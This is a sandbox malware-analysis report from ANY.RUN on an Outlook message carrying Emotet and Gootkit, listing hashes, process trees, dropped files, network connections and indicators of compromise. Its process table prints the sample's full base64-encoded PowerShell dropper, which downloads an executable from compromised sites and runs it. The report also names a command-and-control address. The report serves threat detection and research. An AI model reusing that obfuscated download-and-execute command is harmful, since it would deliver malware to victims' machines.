analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Re Foto.msg

Full analysis: https://app.any.run/tasks/439a4450-13a2-4894-8104-ea42ae6257c0
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 15, 2019, 07:59:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
gootkit
emotet
emotet-doc
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

7E6C0CE6BD4F842C480A8D4B3752FFC0

SHA1:

B50F37EBF79BD1D723D5E0350CB4B4947F949291

SHA256:

1DF70C524A0ED79664B96C0D266ED7892190CE27793696898C9A2A9493B82758

SSDEEP:

3072:BtQtimi1Y77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qzMaJSWI+zy0WD7TLv:Etf77HUUUUUUUUUUUUUUUUUUUT52Vg14

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • GOTKIT detected

      • powershell.exe (PID: 1556)
      • 997.exe (PID: 2872)
    • Application was dropped or rewritten from another process

      • 997.exe (PID: 2872)
      • 997.exe (PID: 3676)
      • soundser.exe (PID: 2736)
      • soundser.exe (PID: 2692)
    • Emotet process was detected

      • soundser.exe (PID: 2736)
  • SUSPICIOUS

    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 3516)
      • powershell.exe (PID: 1556)
    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 3516)
    • Starts Microsoft Office Application

      • OUTLOOK.EXE (PID: 3516)
      • WINWORD.EXE (PID: 2484)
    • Application launched itself

      • WINWORD.EXE (PID: 2484)
      • 997.exe (PID: 3676)
      • soundser.exe (PID: 2736)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1556)
      • 997.exe (PID: 2872)
    • Starts itself from another location

      • 997.exe (PID: 2872)
    • Connects to server without host name

      • soundser.exe (PID: 2692)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2484)
      • OUTLOOK.EXE (PID: 3516)
      • WINWORD.EXE (PID: 2612)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2484)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (41.3)
.oft | Outlook Form Template (24.1)
.doc | Microsoft Word document (18.6)
.doc | Microsoft Word document (old ver.) (11)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start outlook.exe winword.exe no specs winword.exe no specs #GOOTKIT powershell.exe 997.exe no specs #GOOTKIT 997.exe #EMOTET soundser.exe no specs soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
3516"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Re Foto.msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
2484"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\JKT30KVB\DAT 3097 5294397579.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2612"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1556powershell -enc JABVADYAOAA0ADMAOAAxADEAPQAnAEgAMgAxADAAOAA5ACcAOwAkAEMANgA1ADYAMAA2AF8AIAA9ACAAJwA5ADkANwAnADsAJABVADgAMwAxADIANgA9ACcAVABfADEAOQA1ADMANgA0ACcAOwAkAEkAMgAzADEAOAAyADIANwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQwA2ADUANgAwADYAXwArACcALgBlAHgAZQAnADsAJAByADEANAA4ADEAMwA2AD0AJwBCADcAOAA5ADAAMAAwACcAOwAkAHEANgAwADQANgBfADUANwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAEUAYABCAGAAYwBMAGkAZQBuAHQAOwAkAEcAMAAyADIAOQA0ADcANgA9ACcAaAB0AHQAcABzADoALwAvAHQAZQBjAG4AbwBsAG8AZwBpAGEAbwBmAGkAYwBpAGEAbAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AYgByADgAMwAvAEAAaAB0AHQAcAA6AC8ALwBlAHYAYQBtAG8AdABlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AbAAwADcAYgBwADgANAA4ADUALwBAAGgAdAB0AHAAOgAvAC8AdABlAHIAbQBpAG4AYQBsAC0AaABlAGEAdgBlAG4ALgBjAG8AbQAvADIAMAAwADYALwB3ADUAMQB6ADgANwAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGgAdQB6AHUAcgB1AG4AawBhAGwAYgBpAC4AbgBlAHQALwB3AHAALQBhAGQAbQBpAG4ALwAwAG0AaAA0ADcANQAvAEAAaAB0AHQAcABzADoALwAvAHIAZQBnAGkAZwBvAHMAYwBvAHIAaQBuAGcALgBjAG8AbQAvADcAYgAwAG8AZQB3AGUALwAzADIAZgBmAGQAMwA5AC8AJwAuAHMAUABMAEkAVAAoACcAQAAnACkAOwAkAEoANQA3ADkANQBfAD0AJwB1ADMAOQBfADYANgAnADsAZgBvAHIAZQBhAGMAaAAoACQASwA5ADUAXwAzADUAOQA1ACAAaQBuACAAJABHADAAMgAyADkANAA3ADYAKQB7AHQAcgB5AHsAJABxADYAMAA0ADYAXwA1ADcALgBEAE8AVwBuAEwAbwBBAEQAZgBpAEwAZQAoACQASwA5ADUAXwAzADUAOQA1ACwAIAAkAEkAMgAzADEAOAAyADIANwApADsAJABJADYAMAA4ADcAMQA9ACcAdwA5ADIAOAAzADIAXwA3ACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQASQAyADMAMQA4ADIAMgA3ACkALgBMAGUAbgBHAFQASAAgAC0AZwBlACAAMwA5ADcAOQA5ACkAIAB7AC4AKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEkAMgAzADEAOAAyADIANwA7ACQAQgAwADEAOAA0ADEAPQAnAE4ANQA2ADYAMQA1ACcAOwBiAHIAZQBhAGsAOwAkAFIAXwA2ADgAMgAwADcAMAA9ACcAQQAwADgANAAyAF8AMwA0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAMAA2ADcANwA4ADMAPQAnAEsAMQAzADgANQA3ADcAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3676"C:\Users\admin\997.exe" C:\Users\admin\997.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Exit code:
0
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
2872--d3f25675C:\Users\admin\997.exe
997.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Exit code:
0
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
2736"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
997.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Exit code:
0
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
2692--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
Total events
3 757
Read events
2 849
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
6
Text files
24
Unknown types
21

Dropped files

PID
Process
Filename
Type
3516OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVR3E73.tmp.cvr
MD5:
SHA256:
3516OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DF496AD7481535F66A.TMP
MD5:
SHA256:
3516OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\JKT30KVB\DAT 3097 5294397579 (2).doc\:Zone.Identifier:$DATA
MD5:
SHA256:
2484WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6044.tmp.cvr
MD5:
SHA256:
2484WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_DA9C2E41-1743-4B15-B71B-B38FDF35D7C4.0\BEE3B963.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
3516OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:1E8F60F564D23D35AB466D2521549283
SHA256:D57EEF2D476D3A6FD841CEEDCDCDD5DD253512974CAA6093426701880280413A
3516OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\JKT30KVB\DAT 3097 5294397579.docdocument
MD5:B35AB66416E7A74FF492A352097942A4
SHA256:A69AD422C2EE9395EBA421651C5D1D72CB838078DC88071D88CF0268EDF0D62B
3516OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_Calendar_2_077CDE67026B0442BD94BBDCB4C8B623.datxml
MD5:B21ED3BD946332FF6EBC41A87776C6BB
SHA256:B1AAC4E817CD10670B785EF8E5523C4A883F44138E50486987DC73054A46F6F4
2484WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_DA9C2E41-1743-4B15-B71B-B38FDF35D7C4.0\BEE3B963.docdocument
MD5:B35AB66416E7A74FF492A352097942A4
SHA256:A69AD422C2EE9395EBA421651C5D1D72CB838078DC88071D88CF0268EDF0D62B
3516OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\JKT30KVB\DAT 3097 5294397579 (2).docdocument
MD5:B35AB66416E7A74FF492A352097942A4
SHA256:A69AD422C2EE9395EBA421651C5D1D72CB838078DC88071D88CF0268EDF0D62B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3516
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
2692
soundser.exe
POST
186.121.223.131:80
http://186.121.223.131/srvc/between/ringin/
BO
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2692
soundser.exe
186.121.223.131:80
AXS Bolivia S. A.
BO
malicious
1556
powershell.exe
104.28.6.23:443
tecnologiaoficial.com
Cloudflare Inc
US
shared
3516
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
tecnologiaoficial.com
  • 104.28.6.23
  • 104.28.7.23
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info